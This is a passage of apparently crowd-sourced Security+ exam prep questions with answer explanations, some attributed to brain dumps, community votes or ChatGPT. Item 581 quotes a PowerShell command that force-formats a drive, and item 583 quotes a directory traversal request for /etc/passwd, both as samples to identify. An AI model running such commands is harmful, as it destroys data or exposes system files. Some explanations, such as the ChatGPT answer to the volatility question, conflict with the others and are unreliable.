D. POP3S is not supported

A

A. The S/MIME plug-in is not enabled

Here’s why:

S/MIME (Secure/Multipurpose Internet Mail Extensions): S/MIME is a standard for public key encryption and signing of MIME data (including email messages). To decrypt and view encrypted emails, the recipient's email client typically needs to have a S/MIME plug-in or support enabled. If the S/MIME plug-in is not enabled or configured correctly in the email client, the recipient will encounter errors when trying to open encrypted messages.

Let’s briefly review the other options for clarity:

B. The SSL certificate has expired: SSL certificates are used for securing connections over HTTPS and other protocols, not typically for decrypting email messages. While an expired SSL certificate could cause connection issues for receiving emails, it wouldn't directly prevent the decryption of an encrypted email.

C. Secure IMAP was not implemented: Secure IMAP (IMAPS) is a protocol used for accessing email securely over IMAP. However, its implementation status wouldn't directly affect the ability to decrypt an encrypted email.

D. POP3S is not supported: POP3S (POP3 over SSL) is a protocol used for retrieving emails securely via POP3. Like IMAPS, its support status wouldn't directly impact the decryption of an encrypted email.

Therefore, based on the scenario provided, the most likely cause of the issue where the financial analyst cannot open the encrypted email is that A. The S/MIME plug-in is not enabled or properly configured in the email client.

572
Q

A company develops a complex platform that is composed of a single application. After several issues with upgrades, the systems administrator recommends breaking down the application into unique, independent modules. Which of the following best identifies the systems administrator’s recommendation?

A. Virtualization
B. Serverless
C. Microservices
D. API gateway

A

C. Microservices

Here’s why:

Microservices: This architectural style involves breaking down a complex application into smaller, independent services that can be developed, deployed, and scaled independently. Each microservice typically handles a specific business function and communicates with other services through APIs. This approach helps improve flexibility, scalability, and ease of maintenance compared to monolithic applications.

Let’s briefly review the other options for clarity:

A. Virtualization: This refers to creating virtual instances of computing resources, such as servers, operating systems, storage devices, or network resources. While virtualization can aid in managing and deploying applications, it doesn't inherently involve breaking down a single application into smaller modules.

B. Serverless: Serverless computing abstracts the infrastructure management from developers, allowing them to focus on writing code without worrying about server provisioning or scaling. It's a deployment model rather than an architectural approach to breaking down applications into modules.

D. API gateway: An API gateway is a server that acts as an API front-end, receiving API requests, enforcing throttling and security policies, and routing them to the appropriate backend services. It's not directly related to breaking down a monolithic application into smaller, independent modules.

Therefore, the most appropriate choice that identifies the systems administrator’s recommendation to break down the application into unique, independent modules is C. Microservices. This approach would address the issues with upgrades by allowing changes and updates to be made to individual services without impacting the entire application.

573
Q

Which of the following would be the best way to block unknown programs from executing?

A. Access control list
B. Application allow list
C. Host-based firewall
D. DLP solution

A

B. Application allow list

Here’s why:

Application allow list (also known as Application Whitelisting): This security measure allows only approved or recognized programs (applications) to run on a system. Any program not explicitly listed on the allow list will be blocked from executing. This approach is highly effective in preventing unauthorized or unknown programs from running, thereby reducing the risk of malware and unauthorized software execution.

Let’s briefly review the other options:

A. Access control list (ACL): ACLs are typically used to control access permissions to resources (such as files, directories, or network shares) based on user identities or groups. While ACLs are important for access control, they do not specifically prevent unknown programs from executing.

C. Host-based firewall: Host-based firewalls control network traffic to and from a host system based on predetermined security rules. They can restrict communication but are not primarily designed to block unknown programs from executing.

D. DLP solution (Data Loss Prevention): DLP solutions focus on protecting sensitive data from unauthorized access or exfiltration. While they may include features to prevent certain types of files or data from being transferred, they are not typically used to block unknown programs from executing.

Therefore, B. Application allow list is the best choice for blocking unknown programs from executing because it provides proactive control over which programs are allowed to run on a system, thereby reducing the attack surface and enhancing security.

574
Q

A company is planning to install a guest wireless network so visitors will be able to access the internet. The stakeholders want the network to be easy to connect to so time is not wasted during meetings. The WAPs are configured so that power levels and antennas cover only the conference rooms where visitors will attend meetings. Which of the following would best protect the company’s internal wireless network against visitors accessing company resources?

A. Configure the guest wireless network to be on a separate VLAN from the company’s internal wireless network.
B. Change the password for the guest wireless network every month.
C. Decrease the power levels of the access points for the guest wireless network.
D. Enable WPA2 using 802.1X for logging on to the guest wireless network.

A

A. Configure the guest wireless network to be on a separate VLAN from the company’s internal wireless network.

Here’s why this is the best choice:

Separate VLAN: By placing the guest wireless network on a separate VLAN (Virtual Local Area Network), you isolate it from the company's internal network. This separation ensures that devices connected to the guest network cannot directly access internal resources, such as servers or printers, that reside on the company network. It effectively limits the potential impact of any security breaches or unauthorized access attempts from guest devices.

Let’s briefly review the other options for clarity:

B. Change the password for the guest wireless network every month: While changing passwords regularly is a good security practice, it's not as effective in isolation for protecting against guests accessing internal resources. Guests could still attempt to access company resources if they somehow gain access to the network.

C. Decrease the power levels of the access points for the guest wireless network: Lowering power levels affects coverage but does not prevent guests from accessing internal resources if they can connect to the same network segment.

D. Enable WPA2 using 802.1X for logging on to the guest wireless network: While WPA2 with 802.1X provides strong authentication for connecting devices, it's typically more complex and may not align with the goal of making the guest network easy to connect to for visitors.

Therefore, A. Configure the guest wireless network to be on a separate VLAN from the company’s internal wireless network is the best choice. It provides effective isolation between guest traffic and internal resources while still allowing convenient internet access for visitors.

575
Q

An organization relies on third-party videoconferencing to conduct daily business. Recent security changes now require all remote workers to utilize a VPN to corporate resources. Which of the following would best maintain high-quality videoconferencing while minimizing latency when connected to the VPN?

A. Using geographic diversity to have VPN terminators closer to end users
B. Utilizing split tunneling so only traffic for corporate resources is encrypted
C. Purchasing higher bandwidth connections to meet the increased demand
D. Configuring QoS properly on the VPN accelerators

A

(Brain dump : B. Utilizing split tunneling so only traffic for corporate resources is encrypted)
(Communty : B 95%)

To maintain high-quality video conferencing while minimizing latency when connected to the VPN, an organization should utilize split tunneling. This approach routes only essential corporate traffic through the VPN, allowing non-essential traffic to be directed over the regular Internet for improved call quality

(Community D 51%, B 47%)

D. Configuring QoS properly on the VPN accelerators

Here’s why:

Quality of Service (QoS): QoS mechanisms prioritize certain types of network traffic over others, ensuring that critical applications like videoconferencing receive sufficient bandwidth and minimal latency. By configuring QoS properly on the VPN accelerators, the organization can prioritize videoconferencing traffic over other types of traffic going through the VPN. This helps to maintain consistent video quality and responsiveness during meetings, even when corporate resources are accessed through the VPN.

Let’s briefly review the other options for clarity:

A. Using geographic diversity to have VPN terminators closer to end users: While this can reduce latency by minimizing the physical distance between users and VPN terminators, it may not directly address the prioritization of videoconferencing traffic or ensure consistent performance.

B. Utilizing split tunneling so only traffic for corporate resources is encrypted: Split tunneling can reduce the load on the VPN by allowing non-corporate traffic to bypass it entirely, but it doesn't inherently address QoS for videoconferencing traffic.

C. Purchasing higher bandwidth connections to meet the increased demand: While increasing bandwidth can help accommodate more traffic, it doesn't guarantee low latency or prioritize specific types of traffic like videoconferencing without proper QoS configuration.

Therefore, D. Configuring QoS properly on the VPN accelerators is the best option to ensure that videoconferencing quality remains high while minimizing latency for remote workers connected via VPN to corporate resources.

576
Q

A security analyst is scanning a company’s public network and discovers a host is running a remote desktop that can be used to access the production network. Which of the following changes should the security analyst recommend?

A. Changing the remote desktop port to a non-standard number
B. Setting up a VPN and placing the jump server inside the firewall
C. Using a proxy for web connections from the remote desktop server
D. Connecting the remote server to the domain and increasing the password length

A

B. Setting up a VPN and placing the jump server inside the firewall

Here’s why:

Setting up a VPN: A Virtual Private Network (VPN) creates a secure encrypted tunnel for remote access to internal resources. By requiring VPN access, the company ensures that only authorized users with valid credentials can connect to the internal network. This approach mitigates the risk of unauthorized access and enhances overall security.

Placing the jump server inside the firewall: A jump server (or bastion host) is a hardened server that acts as an intermediary between external networks (such as the public internet) and the internal network. Placing the jump server inside the firewall adds an additional layer of protection by restricting direct access to internal resources and allowing controlled access only through the VPN.

Let’s briefly review the other options for clarity:

A. Changing the remote desktop port to a non-standard number: While this can obscure the remote desktop service from casual scans, it's not as effective as VPN access in securing remote access to the production network. Sophisticated attackers can still discover non-standard ports, and it doesn't provide encryption or authentication mechanisms offered by VPNs.

C. Using a proxy for web connections from the remote desktop server: This option focuses on web traffic and does not address the broader security concerns related to direct remote desktop access from the public network.

D. Connecting the remote server to the domain and increasing the password length: While increasing password length is good practice for security, connecting the remote server directly to the domain does not necessarily enhance security against remote desktop access from the public network. It also doesn't address the need for secure access mechanisms like VPNs.

Therefore, B. Setting up a VPN and placing the jump server inside the firewall is the most effective recommendation to secure access to the production network while allowing remote desktop access. It ensures that access is authenticated, encrypted, and controlled through a secure channel.

577
Q

A company recently experienced a major breach. An investigation concludes that customer credit card data was stolen and exfiltrated through a dedicated business partner connection to a vendor, who is not held to the same security control standards. Which of the following is the most likely source of the breach?

A. Side channel
B. Supply chain
C. Cryptographic downgrade
D. Malware

A

B. Supply chain

Here’s why:

Supply chain: In cybersecurity, the supply chain refers to the network of vendors, suppliers, and partners who provide goods and services to an organization. When an organization's security controls do not extend to these external entities, they can become vulnerable points of entry for attackers. If the vendor handling the customer credit card data does not maintain adequate security measures, it can lead to breaches where sensitive data is exfiltrated.

Let’s briefly review the other options for clarity:

A. Side channel: Side channel attacks typically involve exploiting unintended communication channels or weaknesses in physical devices (such as power consumption or electromagnetic emissions) to extract information. While side channel attacks are a concern, they are less likely to be the source of a breach involving exfiltration of credit card data through a vendor connection.

C. Cryptographic downgrade: This refers to a scenario where an attacker forces a system to use weaker cryptographic algorithms or protocols, potentially weakening security. While relevant in other contexts, it's not directly applicable to the breach scenario described.

D. Malware: Malware refers to malicious software designed to disrupt, damage, or gain unauthorized access to computer systems. While malware could potentially be involved in a breach scenario, the description provided focuses more on the vulnerability introduced through the vendor's insecure connection rather than an attack vector like malware.

Therefore, B. Supply chain is the most likely source of the breach where customer credit card data was exfiltrated through a vendor who lacks comparable security controls. This highlights the importance of securing not only internal systems but also external connections and partners within the supply chain.

578
Q

A company would like to provide flexibility for employees on device preference. However, the company is concerned about supporting too many different types of hardware. Which of the following deployment models will provide the needed flexibility with the greatest amount of control and security over company data and infrastructure?

A. BYOD
B. VDI
C. COPE
D. CYOD

A

B. VDI (Virtual Desktop Infrastructure)

Here’s why VDI is a suitable choice:

Flexibility: VDI allows employees to access their desktop environment and company applications from various devices (laptops, tablets, thin clients, etc.) regardless of the hardware specifications. Employees can use their preferred devices while accessing a standardized virtual desktop provided by the company.

Control and Security: With VDI, the company retains control over the virtual desktop environment hosted on centralized servers. This enables centralized management of software updates, security patches, and access controls. Since data and applications reside on the centralized servers rather than the endpoint devices, security risks associated with diverse hardware are reduced.

Let’s briefly review the other options for clarity:

A. BYOD (Bring Your Own Device): BYOD allows employees to use their personal devices for work purposes. While BYOD offers flexibility, it can present challenges for security and management, as the company has less control over employee-owned devices.

C. COPE (Corporate-Owned, Personally Enabled): COPE provides employees with company-owned devices that they can also use for personal purposes. While it offers some control over the hardware and security, it doesn't provide the same flexibility as VDI in terms of supporting a wide range of employee device preferences.

D. CYOD (Choose Your Own Device): CYOD allows employees to choose from a selection of company-approved devices. While it offers more control than BYOD, it still involves managing diverse hardware types and configurations, which can be challenging.

Therefore, B. VDI (Virtual Desktop Infrastructure) is the deployment model that best provides the needed flexibility for employees on device preference while maintaining control and security over company data and infrastructure.

579
Q

Which of the following threat actors is most likely to be motivated by ideology?

A. Business competitor
B. Hacktivist
C. Criminal syndicate
D. Script kiddie
E. Disgruntled employee

A

B. Hacktivist

Here’s why:

Hacktivist: Hacktivists are individuals or groups who use hacking and other digital techniques to promote political ends or social change. They are motivated by ideological beliefs and may target organizations or individuals that they perceive as representing opposing ideologies or engaging in activities they oppose.

Let’s briefly review the other options for clarity:

A. Business competitor: Business competitors are motivated by financial gain and market advantage rather than ideology.

C. Criminal syndicate: Criminal syndicates are motivated by profit from illegal activities such as extortion, fraud, or theft, rather than ideology.

D. Script kiddie: Script kiddies are typically inexperienced hackers who use pre-written scripts or tools to launch attacks for fun, curiosity, or to prove their skills, rather than for ideological reasons.

E. Disgruntled employee: Disgruntled employees may engage in malicious activities due to personal grievances or dissatisfaction with their employer, but this motivation is personal rather than ideological.

Therefore, B. Hacktivist is the most likely threat actor to be motivated by ideology among the options provided.

580
Q

A user would like to install software and features that are not available with a mobile device’s default software.
Which of the following would all the user to install unauthorized software and enable new features?

A. SQLi
B. Cross-site scripting
C. Jailbreaking
D. Side loading

A

C. Jailbreaking

Here’s why:

Jailbreaking: Jailbreaking is the process of removing software restrictions imposed by the device manufacturer or operating system provider (such as Apple or Android). By jailbreaking a device, users can gain root access or administrative privileges, allowing them to bypass limitations and install unauthorized apps, customize the user interface, and enable features not supported by the default software.

Let’s briefly review the other options for clarity:

A. SQLi (SQL Injection): SQLi is a technique used to attack web applications by inserting malicious SQL code into input fields, aiming to manipulate the application's database. It's unrelated to installing unauthorized software on a mobile device.

B. Cross-site scripting: XSS is a vulnerability that allows attackers to inject malicious scripts into web pages viewed by other users. It's not related to installing unauthorized software on a mobile device.

D. Side loading: Sideloading refers to the process of installing an application onto a device from a source other than the official app store. While sideloading can install apps not available in the app store, it typically requires enabling a setting on the device rather than bypassing restrictions like jailbreaking does.

Therefore, C. Jailbreaking is the correct choice for enabling users to install unauthorized software and enable new features on a mobile device by circumventing manufacturer or operating system restrictions.

581
Q

A user downloaded an extension for a browser and the user’s device later became infected. The analyst who is investigating the incident saw various logs where the attacker was hiding activity by deleting data. The following was observed running:
New-Partition -DiskNumber 2 -UseMaximumSize -AssignDriveLetter C| Format-Volume –
DriveLetter C – FileSystemLabel “New”-FileSystem NTFS – Full -Force –
Confirm:$false |
Which of the following is the malware using to execute the attack?

A. PowerShell
B. Python
C. Bash
D. Macros

A

A. PowerShell

New-Partition: This cmdlet is used in PowerShell to create a new partition on a specified disk.

Format-Volume: This cmdlet is used to format a volume with a specified file system and other parameters.

-DriveLetter C: Specifies the drive letter for the partition.

-FileSystemLabel "New": Sets the file system label to "New".

-FileSystem NTFS: Specifies the file system type as NTFS.

-Full -Force -Confirm:$false: These are additional parameters used to perform the operation without prompting for confirmation and with full formatting.

This command sequence is typical of PowerShell usage by malware to perform disk operations and potentially hide malicious activities by formatting or creating new partitions.

Therefore, the correct answer is A. PowerShell.

582
Q

An organization recently acquired an ISO 27001 certification. Which of the following would most likely be considered a benefit of this certification?

A. It allows for the sharing of digital forensics data across organizations.
B. It provides insurance in case of a data breach
C. It provides complimentary training and certification resources to IT security staff
D. It certifies the organization can work with foreign entities that require a security clearance
E. It assures customers that the organization meets security standards

A

E. It assures customers that the organization meets security standards

Here’s why this is the correct answer:

Assurance of Security Standards: ISO 27001 is an internationally recognized standard that outlines best practices for information security management systems (ISMS). By achieving certification, an organization demonstrates that it has implemented rigorous security controls and processes to protect information assets. This assurance is crucial for building trust with customers, partners, and stakeholders who are concerned about data security.

Let’s briefly review the other options for clarity:

A. It allows for the sharing of digital forensics data across organizations: ISO 27001 certification focuses on information security management within an organization and does not directly facilitate the sharing of digital forensics data across organizations.

B. It provides insurance in case of a data breach: ISO 27001 certification itself does not provide insurance coverage in case of a data breach. Organizations may separately obtain cybersecurity insurance for financial protection in such events.

C. It provides complimentary training and certification resources to IT security staff: While training and certification resources may be available from various sources, they are not intrinsic benefits of ISO 27001 certification itself.

D. It certifies the organization can work with foreign entities that require a security clearance: ISO 27001 certification demonstrates compliance with international security standards, which can facilitate business relationships with entities that prioritize security, but it does not directly certify clearance for working with foreign entities.

Therefore, E. It assures customers that the organization meets security standards is the most likely benefit of ISO 27001 certification, as it enhances credibility and trust regarding information security practices within the organization.

583
Q

A junior security analyst is reviewing web server logs and identifies the following pattern in the log file:
http://comptia.org/../../../etc/passwd
Which of the following types of attacks is being attempted and how can it be mitigated?

A. XSS; implement a SIEM
B. CSRF; implement an IPS
C. Directory traversal; implement a WAF
D. SQL injection; implement an IDS

A

C. directory traversal attack.

Explanation:

Directory traversal: This attack involves an attempt to access files and directories that are stored outside of the web root directory. In this case, ../../../etc/passwd suggests an attempt to traverse upwards in the directory structure (../) multiple times to reach the /etc/passwd file, which is a sensitive system file often found on Unix-like systems.

Mitigation:

C. Directory traversal; implement a WAF (Web Application Firewall): A WAF can help mitigate directory traversal attacks by inspecting incoming requests and blocking those that attempt to access files or directories outside of the intended directory structure. WAFs can be configured with rules to detect and prevent such traversal attempts, thereby protecting the web server from unauthorized access to sensitive files.

Let’s briefly review why the other options are not correct for this scenario:

A. XSS (Cross-Site Scripting); implement a SIEM (Security Information and Event Management): XSS involves injecting malicious scripts into web pages viewed by other users. A SIEM is not directly related to mitigating XSS attacks; web application security measures like input validation and output encoding are more appropriate.

B. CSRF (Cross-Site Request Forgery); implement an IPS (Intrusion Prevention System): CSRF involves tricking users into unintentionally performing actions on a web application where they are authenticated. An IPS is not specifically designed to mitigate CSRF; protections against CSRF typically involve tokens and secure coding practices.

D. SQL injection; implement an IDS (Intrusion Detection System): SQL injection involves manipulating SQL queries through user input to gain unauthorized access to the database. An IDS can detect suspicious SQL injection attempts, but for mitigation, input validation and prepared statements in application code are more effective.

Therefore, the correct answer is C. Directory traversal; implement a WAF, as this best aligns with mitigating the observed attack pattern in the web server logs.

584
Q

A security professional wants to enhance the protection of a critical environment that is used to store and manage a company’s encryption keys. The selected technology should be tamper resistant. Which of the following should the security professional implement to achieve the goal?

A. DLP
B. HSM
C. CA
D. FIM

A

B. HSM (Hardware Security Module)

Here’s why HSM is the correct choice:

Tamper Resistance: HSMs are specialized hardware devices designed to generate, store, and manage cryptographic keys securely. They are built with physical and logical protections against tampering and unauthorized access. HSMs typically include features such as tamper-evident seals, physical enclosures that resist intrusion, and mechanisms to zeroize (erase) keys if tampering is detected.

Encryption Key Management: HSMs provide a secure environment for storing and managing encryption keys, ensuring that keys are protected from exposure and unauthorized use. They support operations such as key generation, encryption, decryption, and digital signing, all while maintaining high levels of security.

Let’s briefly review the other options for clarity:

A. DLP (Data Loss Prevention): DLP solutions focus on preventing unauthorized data exfiltration and ensuring compliance with data security policies. While important for overall data protection, DLP does not provide the specific tamper-resistant environment needed for secure key management.

C. CA (Certificate Authority): CAs issue digital certificates used to authenticate the identity of users and systems in networks. While certificates play a role in encryption and security, they do not provide the physical and operational security features required for tamper-resistant key management.

D. FIM (File Integrity Monitoring): FIM tools monitor and detect changes to files and systems, ensuring their integrity and security. While valuable for detecting unauthorized changes, FIM does not address the secure storage and management of encryption keys.

Therefore, B. HSM (Hardware Security Module) is the most appropriate technology to implement for enhancing the protection of a critical environment used to store and manage encryption keys, with a specific focus on tamper resistance and secure key management capabilities.

585
Q

Which of the following is the correct order of volatility from most to least volatile?

A. Memory, temporary filesystems, routing tables, disk, network storage
B. Cache memory, temporary filesystems, disk, archival media
C. Memory, disk temporary filesystems, cache, archival media
D. Cache, disk, temporary filesystems, network storage, archival media

A

(Brain dump: B. Cache memory, temporary filesystems, disk, archival media)
(Community 96% B)
The order of volatility from most to least volatile is: Cache, RAM, Swap or pagefile, Disk, Attached devices, Network

ChatGTP
A. Memory, temporary filesystems, routing tables, disk, network storage

Explanation:

Memory: This includes system memory (RAM) and is the most volatile as it is lost when the system is powered down.
Temporary filesystems: These include temporary files and data stored in temporary storage locations, which can be deleted or altered frequently.
Routing tables: These are found in network devices and can change frequently with network traffic and device reboots.
Disk: This includes data stored on hard drives, which is less volatile as it remains intact even when the system is powered down.
Network storage: This includes data stored on network-attached storage devices or cloud storage, which is less volatile compared to local disk storage.

This order reflects the general principle that data closer to the CPU and active memory is more volatile and subject to change than data stored on persistent storage media.

586
Q

A Chief Information Security Officer (CISO) wants to explicitly raise awareness about the increase of ransomware-as-a-service in a report to the management team. Which of the following best describes the threat actor in the CISO’s report?

A. Insider threat
B. Hacktivist
C. Nation-state
D. Organized crime

A

D. Organized crime

Here’s why:

Organized crime: Ransomware-as-a-service (RaaS) refers to a business model where cybercriminals, often organized into criminal groups or networks, develop and distribute ransomware tools and infrastructure. These groups provide ransomware to other malicious actors (customers) who then use it to conduct ransomware attacks against targets. The goal is typically financial gain through extortion.

RaaS platforms operate similarly to legitimate software-as-a-service (SaaS) models, providing easy access to ransomware tools and support services for a fee or a percentage of the ransom payments collected. This model enables less technically proficient individuals (customers of RaaS) to conduct ransomware attacks with minimal expertise.

Let’s briefly review the other options for clarity:

A. Insider threat: Refers to individuals within an organization who misuse their access or privileges to compromise security. Insider threats are typically employees or contractors with legitimate access to systems and data.

B. Hacktivist: Refers to individuals or groups who use hacking techniques to promote political ends or social causes. Hacktivists' motivations are typically ideological rather than financial, and they may target organizations or individuals perceived as adversaries.

C. Nation-state: Refers to governments or state-sponsored groups engaging in cyber operations for political, economic, or espionage purposes. Nation-state actors have significant resources and capabilities and may conduct ransomware attacks, but their motivations and operations differ from those of organized crime groups.

Therefore, D. Organized crime best describes the threat actor behind ransomware-as-a-service due to the profit-driven nature and business model of providing ransomware tools and services to other malicious actors.

587
Q

Which of the following agreements defines response time, escalation points, and performance metrics?

A. BPA
B. MOA
C. NDA
D. SLA

A

D. SLA (Service Level Agreement)

Here’s why:

SLA (Service Level Agreement): An SLA is a contract between a service provider and a customer that defines the level of service expected from the service provider. It includes specific terms such as response times, resolution times, escalation procedures, performance metrics (like uptime percentage), and penalties for failing to meet these metrics. SLAs are commonly used in IT services, cloud services, telecommunications, and other service-oriented industries to ensure that agreed-upon levels of service quality are maintained.

Let’s briefly review the other options for clarity:

A. BPA (Business Partnership Agreement): A BPA typically outlines the general terms and conditions of a business partnership, focusing on areas like profit-sharing, roles and responsibilities, and strategic objectives. It does not specifically address operational performance metrics or response times.

B. MOA (Memorandum of Agreement): An MOA is a less formal agreement than an SLA, often used to outline broad understandings between parties regarding cooperation or collaboration. It may cover general principles but typically does not include detailed operational metrics or performance expectations.

C. NDA (Non-Disclosure Agreement): An NDA is a legal agreement that protects confidential information shared between parties. It does not pertain to operational performance metrics or service delivery expectations.

Therefore, D. SLA (Service Level Agreement) is the correct choice as it explicitly defines response time, escalation points, and performance metrics between a service provider and a customer.

588
Q

A bakery has a secret recipe that it wants to protect. Which of the following objectives should be added to the company’s security awareness training?

A. Insider threat detection
B. Risk analysis
C. Phishing awareness
D. Business continuity planning

A

A. Insider threat detection

Here’s why:

Insider threat detection: The bakery's secret recipe is vulnerable to being leaked or stolen by insiders who have legitimate access to the recipe or the means to access it. Insider threats can include employees, contractors, or partners who may misuse their access intentionally or unintentionally. Security awareness training on insider threat detection helps employees recognize suspicious behaviors, understand the importance of protecting sensitive information like recipes, and report any unusual activities that could indicate a potential breach.

While other objectives such as risk analysis, phishing awareness, and business continuity planning are important aspects of security awareness training, they may not directly address the specific threat of insiders accessing and potentially disclosing the bakery’s secret recipe.

Therefore, A. Insider threat detection is the objective that should be added to the bakery’s security awareness training to protect its secret recipe effectively.

589
Q

Which of the following must be considered when designing a high-availability network? (Choose two.)

A. Ease of recovery
B. Ability to patch
C. Physical isolation
D. Responsiveness
E. Attack surface
F. Extensible authentication

A

(Community : AD 100%)
A. Ease of recovery: High-availability networks should be designed in a way that allows for quick and easy recovery in the event of a failure. Redundancy, failover mechanisms, and backup systems are some of the components that can help facilitate smooth recovery.

D. Responsiveness: High-availability networks need to be responsive to ensure that any potential issues or failures are quickly detected, and appropriate actions are taken promptly to minimize downtime and impact.

590
Q

Which of the following strategies shifts risks that are not covered in an organization’s risk strategy?

A. Risk transference
B. Risk avoidance
C. Risk mitigation
D. Risk acceptance

A

A. Risk transference

Here’s why:

Risk transference: This strategy involves transferring the risk to another party, typically through contracts, insurance policies, or outsourcing arrangements. By doing so, the organization shifts the financial burden or responsibility of managing the risk to another entity. This is particularly effective for risks that are deemed too costly to mitigate or manage internally.

Let’s briefly review the other options for clarity:

B. Risk avoidance: This strategy involves avoiding activities or situations that could lead to risk altogether. It does not shift risk but rather eliminates exposure to it.

C. Risk mitigation: This strategy involves reducing the impact or likelihood of risks through proactive measures such as implementing controls, procedures, or safeguards. It aims to reduce the risk rather than transferring it.

D. Risk acceptance: This strategy involves acknowledging the existence of a risk and deciding not to take any action to address it. It is not about shifting or transferring the risk but rather about consciously deciding to live with the consequences if the risk materializes.

Therefore, A. Risk transference is the correct choice as it specifically involves shifting the burden of managing risks to other parties through various contractual or insurance mechanisms.

591
Q

A dynamic application vulnerability scan identified that code injection could be performed using a web form.
Which of the following will be the best remediation to prevent this vulnerability?

A. Implement input validations
B. Deploy MFA
C. Utilize a WAF
D. Configure HIPS

A

A. Implement input validations

Here’s why:

Implement input validations: Input validation involves checking and sanitizing the data entered by users to ensure it meets the expected format and does not contain any malicious code. Proper input validation can prevent code injection attacks by ensuring that inputs are safe before they are processed by the application. This includes validating form inputs, query parameters, and any other user-supplied data.

Let’s briefly review the other options for clarity:

B. Deploy MFA (Multi-Factor Authentication): While MFA enhances security by requiring multiple forms of authentication, it does not address code injection vulnerabilities. MFA is primarily used to prevent unauthorized access to accounts.

C. Utilize a WAF (Web Application Firewall): A WAF can help protect against some forms of code injection by filtering out malicious traffic and blocking attack attempts. However, it is not a substitute for properly validating inputs within the application itself. WAFs provide an additional layer of defense but should not be relied upon as the sole mitigation.

D. Configure HIPS (Host-based Intrusion Prevention System): HIPS can help detect and prevent certain types of attacks on a host system, but it does not specifically address the root cause of code injection vulnerabilities in web applications. HIPS is more focused on protecting the host from various types of threats.

Therefore, A. Implement input validations is the best remediation to directly address and prevent code injection vulnerabilities in a web form by ensuring that user inputs are properly validated and sanitized before being processed by the application.

592
Q

A security administrator needs a method to secure data in an environment that includes some form of checks so that the administrator can track any changes. Which of the following should the administrator set up to achieve this goal?

A. SPF
B. GPO
C. NAC
D. FIM

A

D. FIM (File Integrity Monitoring)

Here’s why:

FIM (File Integrity Monitoring): FIM is a security technology that monitors and detects changes to files and system configurations. It provides a way to track modifications, additions, and deletions of files, which is crucial for maintaining data integrity and detecting potential security breaches. FIM can alert administrators to unauthorized or unexpected changes, helping to identify and respond to incidents promptly.

Let’s briefly review the other options for clarity:

A. SPF (Sender Policy Framework): SPF is an email authentication method designed to detect and prevent email spoofing. It does not provide functionality for securing data or tracking changes to files.

B. GPO (Group Policy Object): GPO is a feature of Microsoft Windows that allows administrators to manage policies and settings for users and computers in an Active Directory environment. While GPO can enforce security policies and configurations, it does not specifically track changes to files or data.

C. NAC (Network Access Control): NAC is a security solution that controls access to a network based on compliance with security policies. It ensures that devices meet certain criteria before being allowed to connect to the network but does not monitor file integrity or track changes to data.

Therefore, D. FIM (File Integrity Monitoring) is the correct choice as it provides the necessary capabilities to secure data and track any changes, helping the administrator to maintain data integrity and detect unauthorized modifications.

593
Q

An analyst is working on an email security incident in which the target opened an attachment containing a worm. The analyst wants to implement mitigation techniques to prevent further spread. Which of the following is the best course of action for the analyst to take?

A. Apply a DLP solution
B. Implement network segmentation
C. Utilize email content filtering.
D. Isolate the infected attachment

A

(Community : B 83%, D 17%)
B. Implement network segmentation

Implementing network segmentation can effectively contain the spread of the worm by isolating the infected system or segment from the rest of the network. This prevents the worm from propagating to other parts of the network and helps mitigate the impact of the incident. Network segmentation is a proactive approach to prevent lateral movement of malware within the network.

While isolating the infected attachment (Option D) can be useful, it might not be as effective in preventing the worm from attempting to spread through other means or vectors beyond the isolated system. Implementing network segmentation provides a broader approach to isolating the affected systems and reducing the potential attack surface for the worm.

ChatGPT
B. Implement network segmentation

Here’s why:

Implement network segmentation: Network segmentation involves dividing the network into smaller, isolated segments or subnetworks. This limits the ability of the worm to spread across the entire network by containing it within a specific segment. By segmenting the network, the analyst can effectively control the flow of traffic and restrict the movement of the worm, preventing it from infecting other parts of the network.

Let’s briefly review the other options for clarity:

A. Apply a DLP (Data Loss Prevention) solution: While DLP solutions are useful for preventing the unauthorized transfer of sensitive data, they do not specifically address the containment or prevention of malware spread within the network.

C. Utilize email content filtering: Email content filtering can help prevent future incidents by blocking malicious attachments or links in emails. However, it does not mitigate the spread of a worm that has already been executed within the network.

D. Isolate the infected attachment: While isolating the infected attachment is important to prevent further executions, it does not address the spread of the worm that may already be propagating through the network.

Therefore, B. Implement network segmentation is the most effective immediate action to prevent the further spread of the worm by isolating and containing it within specific network segments.

594
Q

Sales team members have been receiving threatening voicemail messages and have reported these incidents to the IT security team. Which of the following would be MOST appropriate for the IT security team to analyze?

A. Access control
B. Syslog
C. Session Initiation Protocol traffic logs
D. Application logs

A

C. Session Initiation Protocol traffic logs

Here’s why:

Session Initiation Protocol (SIP) traffic logs: SIP is a protocol used for initiating, maintaining, and terminating real-time communication sessions that involve voice, video, and messaging applications. Voicemail systems often use SIP for handling and routing voice messages. Analyzing SIP traffic logs can help the IT security team trace the origin of the threatening voicemail messages, identify the source of the calls, and understand the call flow.

Let’s briefly review the other options for clarity:

A. Access control: Access control logs would show who accessed what systems and when, which is not directly relevant to analyzing voicemail messages.

B. Syslog: Syslog is a standard for message logging used by various systems and network devices. While it can provide useful information about system events, it may not specifically contain the details needed to trace the voicemail messages.

D. Application logs: These logs could be relevant if the application logs include details about the voicemail system. However, they may not specifically track the SIP traffic, which is more directly related to voice communication.

Therefore, C. Session Initiation Protocol traffic logs is the best choice for analyzing and tracing the source of the threatening voicemail messages received by the sales team members.

595
Q

Which of the following can be used to calculate the total loss expected per year due to a threat targeting an asset?

A. EF x asset value
B. ALE / SLE
C. MTBF x impact
D. SLE x ARO

A

D. SLE x ARO

Here’s why:

SLE (Single Loss Expectancy): This represents the monetary loss expected from a single occurrence of the threat. It is calculated as EF (Exposure Factor) multiplied by the asset value.

ARO (Annualized Rate of Occurrence): This represents the estimated frequency with which the threat is expected to occur in a year.

The formula to calculate the total annual loss, or Annualized Loss Expectancy (ALE), is:
ALE=SLE×AROALE=SLE×ARO

Let’s briefly review the other options for clarity:

A. EF x asset value: This calculation gives you the SLE (Single Loss Expectancy), not the annualized loss expectancy.

B. ALE / SLE: This calculation gives you the ARO (Annualized Rate of Occurrence), not the total loss expected per year.

C. MTBF x impact: MTBF (Mean Time Between Failures) is typically used in reliability engineering to predict the time between failures of a system during operation. It is not used to calculate the total loss expected per year due to a threat.

Therefore, D. SLE x ARO is the correct formula to calculate the total loss expected per year due to a threat targeting an asset.

596
Q

A security engineer is hardening existing solutions to reduce application vulnerabilities. Which of the following solutions should the engineer implement FIRST? (Choose two.)

A. Auto-update
B. HTTP headers
C. Secure cookies
D. Third-party updates
E. Full disk encryption
F. Sandboxing
G. Hardware encryption

A

